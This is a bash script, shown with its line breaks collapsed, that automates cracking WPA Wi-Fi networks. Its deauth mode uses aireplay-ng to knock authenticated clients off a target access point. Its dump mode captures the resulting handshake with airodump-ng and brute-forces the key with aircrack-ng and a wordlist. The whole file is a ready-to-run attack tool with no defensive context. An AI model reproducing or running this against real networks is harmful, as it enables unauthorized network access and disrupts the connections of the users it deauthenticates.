#!/bin/bash if [ $# -eq 0 ]; then echo echo " Cracks WPA networks with authenticated clients" echo " Usage: $0 " echo exit 1; fi case $1 in dump) airodump-ng -w scenario4 --channel $2 $3 ; aircrack-ng -s -w polish.dict scenario4-01.cap read exit ;; deauth) aireplay-ng -0 5 -a $2 -c $3 $4 read exit ;; *) aterm -tr +sb -sr -sk -bg black -fg white -fade 90 -bl -tn xterm -geometry 100x30+346+31 -e $0 dump $3 $4 & sleep 10 aterm -tr +sb -sr -sk -bg black -fg white -fade 90 -bl -tn xterm -geometry 100x10+15+363 -e $0 deauth $1 $2 $4 & ;; esac